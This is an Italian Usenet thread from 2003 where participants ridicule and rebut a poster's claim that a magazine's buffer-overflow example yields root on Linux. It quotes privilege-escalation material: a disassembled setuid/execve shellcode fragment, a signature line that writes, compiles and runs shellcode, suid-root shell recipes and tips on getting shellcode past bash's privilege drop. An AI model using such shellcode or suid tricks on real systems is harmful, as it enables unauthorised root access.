(o sei l'admin o l'admin si fida di te) oppure un sysadmin
cerebroleso...

questo in presenza di codice bacato e non sempre e comunque su qualsiasi
pc!

(se trovi un sysadmin che setta i permessi corretti allo script di linux
magazine per farti fare delle prove, dammi l'indirizzo che mi faccio
dare un'account anch'io...)

nei sistemi di produzione, se NON ci sono account con accesso shell e il
sysadmin è normodotato, la prima cosa a cui pensa questo strano essere è
patchare l'impossibile e aggiornare tutto il resto. appunto per evitare
che qualcuno, giusto per provare, controlli se ci sono buffer overflow
sparsi quà e là ne demoni accessibili dall'esterno...

se poi ci sono account utente, si rimuove tutto (TUTTO), aggiungendo
quello che manca solo in caso qualche utente ne lamenti la necessità
(ESTREMA), esista una versione aggiornata, non ci siano stati grossi bug
nelle ultime versioni (la sfiga è sempre in agguato, ma un sw che ha
avuto falle enormi nelle ultime 4 rel stabili, chi lo installa?) e il
sysadmin sia in buona (ovviamente).


per concludere, un'osservazione: se posti su un ng con un subject come
quello con cui hai aperto questo thread, difficilmente chi legge sarà ben
disposto nei tuoi confronti.
nel thread principale facevi riferimento a tuoi amici che hanno ricevuto
cattiva accoglienza e poco aiuto su usenet: tanto dipende anche da come
ti proponi, ovvero dal subj che usi.
considerato che spesso chi scrive qui, lo fa per chiedere aiuto o
consigli, adeguarsi alle regole del ng non guasta...

1700

unread,
Jun 14, 2003, 5:58:38 PM6/14/03
to

Crononauta wrote:
> On Sat, 14 Jun 2003 17:42:26 GMT, 1700 <a...@at.dominio> wrote:
>
>>1 - settare il bit suid di vuln:
>>chmod +s vuln
>>
>>2 - cambiare il proprietario ed il gruppo:
>>chown root.root vuln
>
>
> Ci prendi per il culo? Se ho l'autorità di attribuire gruppo e user
> "root" nonché il bit suid, mi dici che minchia di bisogno ho di fare
> queste menate per avere una shell di root? Sono GIA' root!
>
> Maronna che minchione, e ci ho pure perso del tempo.
>

Una volta compilato sulla tua macchina lo trasporti a mezzo dischetto su
qualsiasi macchina.
Non capite .... ma come puo' essere !

1700

unread,
Jun 14, 2003, 6:00:37 PM6/14/03
to

Paolo opg wrote:
Neanche tu capisci ?
Setti il suid e compili sulla TUA macchina e trasporti il programma su
altre macchine !
Ho provato e funziona !

Duri di comprendonio !


1702

Piergiorgio Sartor

unread,
Jun 14, 2003, 6:07:11 PM6/14/03
to
1700 wrote:

> Una volta compilato sulla tua macchina lo trasporti a mezzo dischetto su
> qualsiasi macchina.

Per prima cosa questo vuol dire che ha accesso
alla macchina fisica, quindi ti basta un floppy
di boot, non serve tutto questo casino.

Secondo, mi spieghi come fai a trasferire il
file e mantenere il bit "s"?

Terzo, non ti pare che lasciare accesso alla
console, al floppy e quant'altro sia un altro
enorme buco di sicurezza.

> Non capite .... ma come puo' essere !

Ma dimmi, sei uno studente di psicologia in
cerca di materiale per la tesi?

bye,

--

piergiorgio

rez

unread,
Jun 14, 2003, 6:10:33 PM6/14/03
to
On Fri, 13 Jun 2003 19:04:44 +0000 (UTC), Kronos wrote:
>rez <r...@rez.localhost> ha scritto:

>>Potresti dire come e quando serve dare chroot per la sicurezza?

>Quando sono in gioco servizi a "rischio" (bind, apache, cvs, ...). Si
[...]

Capit'.. TNX! :-)

--
Ciao, | Attenzione! campo "Reply-To:" alterato ;^)
Remigio Zedda | E-mail: remi...@tiscali.it

-- Linux 2.4.18 su Debian GNU/Linux 3.0 "Woody"

1700

unread,
Jun 14, 2003, 6:14:12 PM6/14/03
to

Piergiorgio Sartor wrote:
> 1700 wrote:
>
>> Una volta compilato sulla tua macchina lo trasporti a mezzo dischetto
>> su qualsiasi macchina.
>
>
> Per prima cosa questo vuol dire che ha accesso
> alla macchina fisica, quindi ti basta un floppy
> di boot, non serve tutto questo casino.
>

ma se ci sono 300 UTENTI CHE LAVORANO come fai a rebootare !
vi arrampicate sugli specchi !


> Secondo, mi spieghi come fai a trasferire il
> file e mantenere il bit "s"?
>
> Terzo, non ti pare che lasciare accesso alla
> console, al floppy e quant'altro sia un altro
> enorme buco di sicurezza.
>

posso avere accesso con ssh e fare cio' che voglio.


>> Non capite .... ma come puo' essere !
>
>
> Ma dimmi, sei uno studente di psicologia in
> cerca di materiale per la tesi?

ingegneria


Piergiorgio Sartor

unread,
Jun 14, 2003, 6:27:58 PM6/14/03
to
1700 wrote:

> ma se ci sono 300 UTENTI CHE LAVORANO come fai a rebootare !
> vi arrampicate sugli specchi !

Tutti e 300 in console?

Ma che vai scrivendo? Ti senti bene?

> posso avere accesso con ssh e fare cio' che voglio.

Sempre da root, non da utente.

>> Ma dimmi, sei uno studente di psicologia in
>> cerca di materiale per la tesi?
>
> ingegneria

E perche` cerchi materiale per una tesi
di psicologia?

bye,

--

piergiorgio

rez

unread,
Jun 14, 2003, 6:32:19 PM6/14/03
to
On Sat, 14 Jun 2003 17:43:32 GMT, 1700 wrote:

>buf_over richiama vuln, e' necessario quindi compilare entrambi.
>La compilazione NON e dico NON da errori (pensate che una rivista come
>Linux Magazine possa inserire i programmi in un articolo che non
>compilano !!!! No dico vi rendete conto? )

Non e` possibile che da te non dia errore. Perche' allora scrivi
questo?
Oppure hai copiato male il sorgente. Guarda:

bash-2.05a# g++ buf_over.C -o buf_over
buf_over.C: In function `int main(int, char **)':
buf_over.C:24: ANSI C++ forbids implicit conversion from `void *' in
initialization

Paolo opg

unread,
Jun 14, 2003, 6:44:01 PM6/14/03
to
1700 <a...@at.dominio> wrote in news:3EEB9ACE...@at.dominio:

...
certo che puoi: copi l'eseguibile sul floppy, lo porti sull'altra
macchina e, come root, lo metti su hd e reimposti lo sticky (perchè nel
passaggio su floppy l'hai perso).
a questo punto, entri come user sulla seconda macchina ed eseguendo hai
l'exploit.
ti è però forse sfuggito che in questo passaggio è NECESSARIO avere
l'accesso root di ENTRAMBE le macchine, semplicemente perchè se metti un
eseguibile con sticky bit su un floppy e poi esegui il mount da utente,
lo sticky bit non è più settato.

fai la prova e controlla.

a me è venuto il dubbio (giusto uno piccolino) e per non sparare vaccate
ho controllato: passando su floppy, perdi il +s.

se anche tu provassi prima di postare, eviteresti figure come quella che
stai facendo in due thread contemporaneamente (uno ti pareva poco...)

sto seguendo anche l'altro (l'originale) e ho letto che fai ingegneria.
che ramo?
gestionale?

Paolo opg

unread,
Jun 14, 2003, 6:50:24 PM6/14/03
to
rez <r...@rez.localhost> wrote in news:slrnbencn...@m300a.mizar:

>
> Non e` possibile che da te non dia errore. Perche' allora scrivi
> questo?
> Oppure hai copiato male il sorgente. Guarda:
>
> bash-2.05a# g++ buf_over.C -o buf_over
> buf_over.C: In function `int main(int, char **)':
> buf_over.C:24: ANSI C++ forbids implicit conversion from `void *' in
> initialization
>

no, non ci siamo.
come ti permetti?
guarda che già ti sei spostato nel thread dei meno abbienti.
e poi azzardi pure l'ipotesi che il codice sia sbagliato?
ragazzo mio... hai ancora molto da imparare...

>:->

1700

unread,
Jun 14, 2003, 6:53:19 PM6/14/03
to

rez wrote:
> On Sat, 14 Jun 2003 17:43:32 GMT, 1700 wrote:
>
>
>>buf_over richiama vuln, e' necessario quindi compilare entrambi.
>>La compilazione NON e dico NON da errori (pensate che una rivista come
>>Linux Magazine possa inserire i programmi in un articolo che non
>>compilano !!!! No dico vi rendete conto? )
>
>
> Non e` possibile che da te non dia errore. Perche' allora scrivi
> questo?
> Oppure hai copiato male il sorgente. Guarda:
>
> bash-2.05a# g++ buf_over.C -o buf_over
> buf_over.C: In function `int main(int, char **)':
> buf_over.C:24: ANSI C++ forbids implicit conversion from `void *' in
> initialization
>

hai sbagliato ! sono due i file !
compilali cosi':

gcc -o buf_over buf_over.c
gcc -o vuln vuln.c

Ma volete comprare il giornale domani, cosi' leggete l'articolo e
buonanotte!

1700

unread,
Jun 14, 2003, 7:22:26 PM6/14/03
to

Maurizio - Tannoiser wrote:


> char *arg[3], mai dichiarato, ma fa lo stesso).
>

E' dichiarato poco sopra.
Leggi bene. Ma vuole leggere prima di postare ?

Ciao


Crononauta

unread,
Jun 14, 2003, 9:03:02 PM6/14/03
to
On Sat, 14 Jun 2003 22:14:12 GMT, 1700 <a...@at.dominio> wrote:
> ma se ci sono 300 UTENTI CHE LAVORANO come fai a rebootare !
> vi arrampicate sugli specchi !

Ma che bisogno hai di rebootare? Nel momento in cui passi a root per
assegnare il bit suid, mi dici che vuoi di più dalla vita? Un Lucano?
Sei GIÀ root!

Ci arrivi a capirlo questo oppure sei senza speranza?

> posso avere accesso con ssh e fare cio' che voglio.

Certo, anche passare a root e assegnare il bit suid. Però di nuovo sei
già root...

> ingegneria

Hint: passa a Giurisprudenza, almeno lì il computer te lo fanno usare
solo con Office per scrivere la tesi, sicuramente è un compito più alla
tua portata.

Saluti.

Crononauta

unread,
Jun 14, 2003, 9:06:02 PM6/14/03
to
On Sat, 14 Jun 2003 22:53:19 GMT, 1700 <a...@at.dominio> wrote:
> Ma volete comprare il giornale domani, cosi' leggete l'articolo e
> buonanotte!

AAAHHH adesso ho capito... è un pubblicitario della rivista... non
capisce una mazza di linux, ma sta subdolamente cercando di farcela
comprare in massa...

rez

unread,
Jun 14, 2003, 9:13:41 PM6/14/03
to
On Sat, 14 Jun 2003 22:53:19 GMT, 1700 wrote:

>Ma volete comprare il giornale domani, cosi' leggete l'articolo e
>buonanotte!

Linux magazine si puo` anche comprare, ma non per quest'articolo,
o per lo meno non io..

D'altra parte non essere troppo sicuro di cio` che vedi in console
quando dici:

=-=-=-=-=-=-=-=-=- cut here =-=-=-=-=-=-=-


>3 - eseguire:
>./buf_over indirizzo a 10 cifre
>ci dara' un INDIRIZZO ed un segmentation fault
>rieseguiamo mettendo INDIRIZZO come primo argomento.
>(Eseguiamo eventualmente un' altra volta se non dovesse funzionare.)

>fatto .....

>provate a fare:
>#: whoami

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-

A` ingegne', guarda questo exploit gia` compilato e perfetto, ora
divento root senza passwd:

[~] rez_2$: fakeroot /bin/bash
bash-2.05a# whoami
root
bash-2.05a# exit
exit
[~] rez_2$: whoami
rez

rez

unread,
Jun 14, 2003, 9:13:42 PM6/14/03
to
On 15 Jun 2003 00:50:24 +0200, Paolo opg wrote:

>no, non ci siamo.
>come ti permetti?

>guarda che giр ti sei spostato nel thread dei meno abbienti.


>e poi azzardi pure l'ipotesi che il codice sia sbagliato?
>ragazzo mio... hai ancora molto da imparare... >:->

Qui tra i meno abbienti si rischia meno.. i poveri non corrono il
pericolo di dover comprare Linux magazine per quell'articolo;-)

Vincenzo Valvano

unread,
Jun 14, 2003, 10:09:37 PM6/14/03
to
1700 ha scritto:
...

> IN fondo ci sono le istruzioni per l'uso per i meno abbienti

Ma basta!! Vuoi capire che se esistesse la possibilità per un normale
utente di diventare root indebitamente, il kernel verrebbe patchato e
reso disponibile su kernel.org in due ore nette?

Linux viene usato da mezzo mondo. Come diavolo fai a pretendere di aver
scoperto (tu e i lettori di LinuxMagazine - ma che fortunati!) una falla
del genere e pensare che questa sia ancora aperta?

Queste semplici considerazioni dovrebbero farti desistere dal portare
avanti la tua tesi.

--
Vincenzo

Maurizio - Tannoiser

unread,
Jun 15, 2003, 5:05:19 AM6/15/03
to
On Sat, 14 Jun 2003 23:22:26 GMT, 1700 wrote:
> Leggi bene. Ma vuole leggere prima di postare ?

Rotfl. Sei disperato. Non hai mai risposto agli altri messaggi. Non sei
nemmeno piu` divertente.

Basta, dai.

--
Maurizio - Tannoiser - Lemmo
Founder Member of ERLUG http://erlug.linux.it
-------------------------------------------------------------------------------

kill -9 them all. Let init sort them out.

Roberto M.

unread,
Jun 15, 2003, 6:14:21 AM6/15/03
to
1700, alle 00:00, domenica 15 giugno 2003, ha scritto:

> Setti il suid e compili sulla TUA macchina e trasporti il programma su
> altre macchine !

E come faresti? A spostare il file su floppy perdi l'owner originale (a meno
che il floppy non sia formattato in ext2, ma sono pochi gli amministratori
che ti lasciano montare i floppy con quel filesystem), lo stesso a mandarlo
via email, e pure se crei un tar; e se non hai il file appartenente a root
non sai che fartene di queste vulnerabilità.

> Ho provato e funziona !

Scusa una cosa, ma se prendi il seguente frammento di codice:

/* --- prova.c --- */


int main(int argc, char *argv[]) {

char *command[2];
command[0] = "/bin/bash";
command[1] = NULL;
execve(name[0], name, NULL);
return 1;
}
/* --- snip --- */

Compili, cambi l'owner e metti root, aggiungi il setuid; poi lanci da utente
normale e ti parte la shell; curiosamente, sei ancora utente normale. In
qualche modo il kernel ti frega: secondo me non è più facile come una volta
fare un buffer overflow... Ciao!
Roberto
--
La verità di un'affermazione non ha niente a che vedere con la sua
credibilità, e viceversa.

nero

unread,
Jun 15, 2003, 5:38:13 AM6/15/03
to
> 1 - settare il bit suid di vuln:
> chmod +s vuln
>
> 2 - cambiare il proprietario ed il gruppo:
> chown root.root vuln

hai idea di cosa fa' questo.......

mi sembra + che scontato che diventi root..........

Blaisorblade

unread,
Jun 15, 2003, 6:42:48 AM6/15/03
to
Mentre stavo compilando un kernel a mio uso e consumo, thori ha scritto:
>
> moria:/tmp# gcc -o buf_over buf_over.c
> buf_over.c: In function `main':
> buf_over.c:41: parse error before `char'
> buf_over.c:43: `arg' undeclared (first use in this function)
> buf_over.c:43: (Each undeclared identifier is reported only once
> buf_over.c:43: for each function it appears in.)
>
> e poi
>
> moria:/tmp# gcc -o vuln vuln.c
> moria:/tmp# ./vuln
>
> indirizzo: 0xbffffd7c (3221224828)
> Segmentation fault
Beh, il segmentation fault è corretto, serve a fornire l'indirizzo del
jump(ho letto l'articolo di cui parla). Sperando che non sia un troll,
comunque gli suggerisco un altro exploit:
1)cp /bin/bash /bin/mybash
2)chown root.root /bin/mybash
3)chmod u+xs /bin/mybash
(anche se alcuni comandi sono ridondanti, tanto per essere sicuri)
dopodiché esegui /bin/mybash e hai una shell di root. Questo funziona su
qualunque distribuzione. Garantito. Una volta ottenuto /bin/mybash,
copialo su un computer SENZA AVERE ACCESSO ROOT su quel computer, tramite
ssh magari. Se non sei root, otterrai un file suid ma che appartiene a te,
non a root. Se lo porti su dischetto, e non sei root, non puoi montarlo;
il mount che poi viene di solito consentito da root nelle distro non ha
l'opzione exec(almeno mi pare, qua ce l'ho ma l'ho aggiunto io). E
comunque, se metti user, si attiva di default nosuid! E con nosuid non
funziona!(tranne se lo esegui come root, ma allora). Chiaro?
--
cat <<EOSIGN
Paolo Giarrusso, aka Blaisorblade(togliere solo REMOVEONLYTHIS per rispondere)
Kernel 2.4.20/2.5.63 on an i686; Linux registered user n. 292729
EOSIGN

nero

unread,
Jun 15, 2003, 5:45:36 AM6/15/03
to
> Ecco, se si cominciasse a metterlo nel killfile evitando di
> rispondergli sarebbe meglio.

ok ok , quando ho torto ho torto ;-)

Blaisorblade

unread,
Jun 15, 2003, 6:52:36 AM6/15/03
to
Mentre stavo compilando un kernel a mio uso e consumo, Roberto M. ha
scritto:

> 1700, alle 00:00, domenica 15 giugno 2003, ha scritto:
>
>> Setti il suid e compili sulla TUA macchina e trasporti il programma su
>> altre macchine !
>
> E come faresti? A spostare il file su floppy perdi l'owner originale (a meno
> che il floppy non sia formattato in ext2, ma sono pochi gli amministratori
> che ti lasciano montare i floppy con quel filesystem), lo stesso a mandarlo
> via email, e pure se crei un tar; e se non hai il file appartenente a root
> non sai che fartene di queste vulnerabilità.
>
>> Ho provato e funziona !
>
> Scusa una cosa, ma se prendi il seguente frammento di codice:
>
> /* --- prova.c --- */
> int main(int argc, char *argv[]) {
> char *command[2];
> command[0] = "/bin/bash";
> command[1] = NULL;
> execve(name[0], name, NULL);
> return 1;
> }
> /* --- snip --- */
>
> Compili, cambi l'owner e metti root, aggiungi il setuid; poi lanci da utente
> normale e ti parte la shell; curiosamente, sei ancora utente normale. In
> qualche modo il kernel ti frega:

No, è solo bash a fregarti. Non ricordo esattamente, ma bash parte come
root; solo che uno tra real e effective id non è 0, quindi bash se ne
accorge e decide di diventare utente normale. La cosa si aggira
facilmente: sapendolo, si aggiunge allo shellcode una chiamata che imposti
il real uid(o l'altro, ora non ricordo). E' solo un tappo per gli
shellcode "arripizzati". E allunga lo shellcode necessario(ma in casi come
questi si può evitare di mettere lo shellcode nel buffer, se non sbaglio,
con qualche capriola, lo leggevo su Smashing the stack for fun and profit,
su www.insecure.org si trova).
> Roberto

Kbyte

unread,
Jun 15, 2003, 9:04:20 AM6/15/03
to
1700 wrote:

Appunto sei duro di comprendonio, stai facendo una figura pessima visto che
sicuramente usi root per fare il mount del floppy.

kbyte@kbytelnx:~$ chmod +s test
kbyte@kbytelnx:~$ ll test
-rwSr-Sr-- 1 kbyte kbyte 0 2003-06-15 14:00 test
kbyte@kbytelnx:~$ mv test /mnt/floppy/
mv: impostazione dei permessi di `/mnt/floppy/test': Operation not permitted
kbyte@kbytelnx:~$ ll /mnt/floppy/
totale 14
-rwxr--r-- 1 kbyte kbyte 13692 2003-05-30 19:21
progettosisop.zip
-rwxr--r-- 1 kbyte kbyte 0 2003-06-15 14:00 test

L'Operation non permitted è proprio dovuto all'impossibilità di settare il
suid. (visto che l'umask nella tabella di fstab per il floppy lo vieta)

--
| /
| \Byte - Andrea Briganti - kbytesys(aaattt)tiscali.it
CSLug member: http://cslug.linux.it - JID: kb...@jabber.linux.it
***Lo zero tende talmente a zero che sembra quasi zero (Prof. univ.)

Della Bianca Giuseppe

unread,
Jun 15, 2003, 10:21:14 AM6/15/03
to
Questo thread ha oltre 65 post, complimenti, chissa quante risposte ricevono
le persone che propongono thread con un minimo di sensatezza.

P.S.
Ho notato (riguarda anche me) che un sistema garantito per ricevere un sacco
di risposte è quello di mettere in dubbio ''linux'', meglio ancora metterlo
alla berlina.
Peccato che sia cosi, dovrebbe essere esattamente al contrario.

Skull

unread,
Jun 15, 2003, 10:44:32 AM6/15/03
to
Sgranocchiando il cranio di Crononauta, vi trovai inciso:

> Ma che bisogno hai di rebootare? Nel momento in cui passi a root per
> assegnare il bit suid, mi dici che vuoi di più dalla vita? Un Lucano?
> Sei GIÀ root!
>
> Ci arrivi a capirlo questo oppure sei senza speranza?

okkio: ho un enorme buco di sicurezza più veloce del suo:

skull@yggdrasyl:~$ su
Password:
yggdrasyl:/home/skull# cp /bin/sh /opt
yggdrasyl:/home/skull# chmod u+s /opt/sh
yggdrasyl:/home/skull# exit
skull@yggdrasyl:~$ whoami
skull
skull@yggdrasyl:~$ /opt/sh
sh-2.05b# whoami
root
sh-2.05b#

Potente, eh???
E senza una riga di C che sia una!!!!

--
Emanuele Balla aka Skull - Public Key #661E5CBF on www.keyserver.com
+----------------------------------------------------------------------+
"And 1.1.81 is officially BugFree(tm), so if you receive any bug-reports
on it, you know they are just evil lies." (By Linus Torvalds)

Skull

unread,
Jun 15, 2003, 11:00:27 AM6/15/03
to
Sgranocchiando il cranio di Paolo opg, vi trovai inciso:

> sto seguendo anche l'altro (l'originale) e ho letto che fai
> ingegneria. che ramo?
> gestionale?

Qualcosa in contrario agli studenti di ingegneria gestionale? (della cui
categoria non faccio più parte ... )

test

unread,
Jun 15, 2003, 11:09:43 AM6/15/03
to
Della Bianca Giuseppe:

> Questo thread ha oltre 65 post, complimenti,

Vuoi aiutarci a raggiungere quota cento?-)

Alessandro.


Skull

unread,
Jun 15, 2003, 11:24:55 AM6/15/03
to
Sgranocchiando il cranio di tho...@despammed.com, vi trovai inciso:

> Uff, ecco, ora ci mancava pure il flame intestino fra ingegneri..
> Quante volte ve lo devo dire che sara' si e no uno studentello del
> primo, max secondo anno che studia da lamer?

Dovevo mettere un paio di emoticons, cosě si capiva. ;-)
Non me la piglio mica per cosě poco...

Kbyte

unread,
Jun 15, 2003, 12:04:21 PM6/15/03
to
Skull wrote:

>> ingegneria. che ramo?
>> gestionale?
> Qualcosa in contrario agli studenti di ingegneria gestionale? (della cui
> categoria non faccio più parte ... )

Ma perchè molti sono contro i gesionali?

Anche un mio prof di laboratorio calcolatori elettronici illustrando un
teorema secondo cui:

Sapere = Potere
Tempo = Denaro

Potenza = Lavoro/Tempo =>
Sapere = Lavoro/$

sa cui $=L/S

dove L è il lavoro e S il sapere, diceva che se volevamo fare soldi
dovevamo andare ad ingegneria gestionale perchè la conoscenza tende a 0...

--
| /
| \Byte - Andrea Briganti - kbytesys(aaattt)tiscali.it
CSLug member: http://cslug.linux.it - JID: kb...@jabber.linux.it

***Berlusconi: Il conflitto di interessi? Non esiste! (E' tutto mio)

Skull

unread,
Jun 15, 2003, 12:21:22 PM6/15/03
to
Sgranocchiando il cranio di Kbyte, vi trovai inciso:

> sa cui $=L/S
>
> dove L è il lavoro e S il sapere, diceva che se volevamo fare soldi
> dovevamo andare ad ingegneria gestionale perchè la conoscenza tende a
> 0...

Dimostrazione interessante ;-)
Però alla facoltà di ingegneria di Udine qualcosa devo: il mio
professore di sistemi lì era tal Montessoro PierLuca... dice nulla ?

Ok, poi ho cambiato facoltà. Infine me ne sono andato. Ma al Dott.
Montessoro credo di dovere molto...

Uno skull e i rimpianti...

Blaisorblade

unread,
Jun 15, 2003, 2:00:35 PM6/15/03
to
Mentre stavo compilando un kernel a mio uso e consumo, SirPsychoSexy ha
scritto:

> Blaisorblade wrote:
>
>
>
> Dovrebe trattarsi della bash2 ma forse anche tcsh adesso iplmementa
> l'impossibilità di fare suid se la shell appartiene a root.
> Ma il problema di fondo non è quello ma la sicurezza del trasporto di un
> file suidato da una macchina all'altra. Non credo esista mezzo (ftp, sftp,
> tar -p, samba, copia_incolla o quant'altro) che permetta di mantenere i
> permessi da un sistema ad un altro.
Beh, avendo un accesso ssh/telnet COME ROOT puoi impostare i permessi. La
storia del floppino mi ha fatto pensare, ma se metti user tra le opzioni
in fstab nasce da solo un carissimo nosuid; se poi root mette tra le opzioni
del floppy user,suid(che tecnicamente è possibile) allora root è
deficiente ma proprio forte.
In quel caso si passa all'ingegneria sociale,
gli si fa scoprire quanto è cretino dopodiché lui, depresso, ti dà
spontaneamente la password di root per aiutarlo :-).
P.S.: qualcuno sa se Guglielmo Cancelli abbia una password di root? Così
magari metto in pratica quanto descritto!

Paolo opg

unread,
Jun 15, 2003, 2:12:33 PM6/15/03
to
Skull <sk...@skullkrusher.net> wrote in
news:bci1mb$iq9hq$2...@ID-125436.news.dfncis.de:

> Sgranocchiando il cranio di Paolo opg, vi trovai inciso:
>
>> sto seguendo anche l'altro (l'originale) e ho letto che fai
>> ingegneria. che ramo?
>> gestionale?
>
> Qualcosa in contrario agli studenti di ingegneria gestionale? (della

> cui categoria non faccio piů parte ... )
>

quasi niente...
;-P

era solo per tirarlo un pň in giro.
avrei potuto scrivere elettronico, ma mi suonava troppo vicino
all'ambito computer.

gestionale suonava meno 'informatico', tutto qua.

:-))

Blaisorblade

unread,
Jun 15, 2003, 2:18:11 PM6/15/03
to
Mentre stavo compilando un kernel a mio uso e consumo, rez ha scritto:

>>comunque gli suggerisco un altro exploit:
>>1)cp /bin/bash /bin/mybash
>>2)chown root.root /bin/mybash
>>3)chmod u+xs /bin/mybash
>>(anche se alcuni comandi sono ridondanti, tanto per essere sicuri)

>>dopodichè esegui /bin/mybash e hai una shell di root. Questo funziona su


>>qualunque distribuzione. Garantito. Una volta ottenuto /bin/mybash,
>

> Ma che diamine di distribuzione hai? Guarda:
Hai ragione, dimenticavo il trucchetto della bash. Siccome è bastarda, se
il real uid e lo effective uid sono diversi, si incazza parecchio e cede i
privilegi di root. Ma altrimenti funzionerebbe(in effetti, basta mettere
suid un prog. che imposta il real uid(mi pare, li confondo sempre) e
fa execve() di bash per essere a posto). Chiedo venia.

rez

unread,
Jun 15, 2003, 2:31:17 PM6/15/03
to
On Sun, 15 Jun 2003 20:18:11 +0200, Blaisorblade wrote:
>Mentre stavo compilando un kernel a mio uso e consumo, rez ha scritto:

>>Ma che diamine di distribuzione hai? Guarda:
>Hai ragione, dimenticavo il trucchetto della bash. Siccome ш bastarda, se

Gia`, infatti come l'ha fatto Skull, col nome "sh", allora si`.

Fabrizio Cattaneo

unread,
Jun 15, 2003, 4:10:47 PM6/15/03
to


Linux contiene anche un'altro incredibile Bug.....

Pensate che se si digita il comando su e si inserisce semplicementa la
password di root ......incredibile.... si diventa root.

Che cagata questo OS....

F.


Trimack

unread,
Jun 16, 2003, 8:38:57 AM6/16/03
to
Stavo attivando i Mega Smasher contro uno Zoalord
quando 1700 <a...@at.dominio> mi ha interrotto:

> IN fondo ci sono le istruzioni per l'uso per i meno abbienti

> (intellettualmente parlando):
> L'unico e dico l'unico, il solo, il mitico che ha capito il problema mi
> sembra "paolo opg".

La questione e' un'altra (e con questo rispondo all'altro tuo post):
su un sistema serio non troverai *mai* qualcosa di cosi' facile da exploitare.
Dando un occhio all'exploit e' un buffer overflow che
modifica l'indirizzo di ritorno dal main.


Puoi spiegarmi come fai a portare da una macchina all'altra del codice
compilato mantenendo come proprietario root e il bit di suid????
Sai forse non ne capisco un ca*** ma, vedi, mi risulta un po'
difficile da credere.


>
> Dato che vi dispiace spendere qualche euro per una rivista:
>

Mi permetto di fare un piccolo commento al codice
(Nessuna vena polemica) con un po' di reverse.

char shellcode[] = "
\x31\xdb // xor %ebx,%ebx
\x31\xc0 // xor %eax,%eax
\xb0\x17 // mov 0x17,%eax
\xcd\x80 // int $0x80
\xb0\x2e // mov 0x2e,%eax
\xcd\x80" // int $0x80

\x68\x2f\x73\x68\xaa // push "/sh"
\x68\x2f\x62\x69\x6e // push "/bin"

Devo continuare? ^____^

> 4 - siate piu' modesti, come "paolo opg" ad esempio

Io direi che sei tu quello che deve essere piu' modesto: non hai
scoperto l'acqua calda. I bof sono noti da piu' di dieci anni.

In piu' aggiungo: hai mai provato a eseguire l'exploit su un kernel patchato
con LIDS o RSBAC o SELinux ....?


> Se anche adesso non funziona !!!!!!!!!!!!

La questione e' sempre la stessa: come fai ad uploadare un file con propietario
root su una macchina remota se non hai i permesi di root su quella macchina?

Un piccolo consiglio: fatti un giro su mailing list di sicurezza:
argomenti sui tecniche di exploit sono all'ordine del giorno.

Trimack.

PS: Hai dato un'occhiata alla mia sign?
^__^

--
echo "char s[]=\"\x68\x61\x63\x6b\x0a\x68\x54\x72\x69\x6d\x89\xe1\x31\"
\"\xc0\x31\xdb\x31\xd2\xb3\x01\xb0\x04\xb2\x08\xcd\x80\x31\xc0\x31\xdb\"
\"\xb0\x01\xb3\x01\xcd\x80\";void main(){int*r;r=(int*)&r+2;(*r)=(int)s;
}">T.c; gcc -w T.c -o T; ./T; rm T T.c

nero

unread,
Jun 16, 2003, 3:59:19 AM6/16/03
to
> Linux contiene anche un'altro incredibile Bug.....
>
> Pensate che se si digita il comando su e si inserisce semplicementa la
> password di root ......incredibile.... si diventa root.

ssssssshhhhhhhhhhh !!!

non diffondere questi trucchi ;-)

CtRiX

unread,
Jun 17, 2003, 6:46:38 AM6/17/03
to
> IN fondo ci sono le istruzioni per l'uso per i meno abbienti
> (intellettualmente parlando):
> L'unico e dico l'unico, il solo, il mitico che ha capito il problema mi
> sembra "paolo opg".
>
> Dato che vi dispiace spendere qualche euro per una rivista:

ROTFL!!!

Quasi meglio delle mail di davide!!!

Max


Paolo opg

unread,
Jun 17, 2003, 1:13:47 PM6/17/03
to
"CtRiX" <CtRiX_ca...@hotmail.com> wrote in news:bcmrio$krj3v$1@ID-
122146.news.dfncis.de:

>
> ROTFL!!!
>
> Quasi meglio delle mail di davide!!!
>
> Max
>

io toglierei il quasi: quelle di davide se le gode dal vivo solo lui.
questa ce la siamo goduta tutti!
:-)

Leonardo Feliceteti

unread,
Jun 18, 2003, 7:03:55 AM6/18/03
to
Buahuha, sono appena entrato nel newsgroup e a leggere questi post mi sto
scompisciando dalle risate
"Piergiorgio Sartor" <piergiorg...@nexgo.REMOVE.THIS.de> ha scritto
nel messaggio news:446sr-...@lazy.lzy...
> Maurizio - Tannoiser wrote:
>
> > Se fossi "burbero" come Thorin, mi metterei una sign tipo: "Non avete
> > capito il programma" (rotflastc).
>
> Ma ddddddaaaaiiiii... :-)
>
> bye,
>
> --
>
> piergiorgio
>


gin...@iol.it

unread,
Jun 19, 2003, 8:10:29 AM6/19/03
to
test wrote:

Propongo una gara di troll
A chi riesce a suscitare gli animi in modo da superare i cento post
gli si regala una copia cartacea della netquette :^>

0 new messages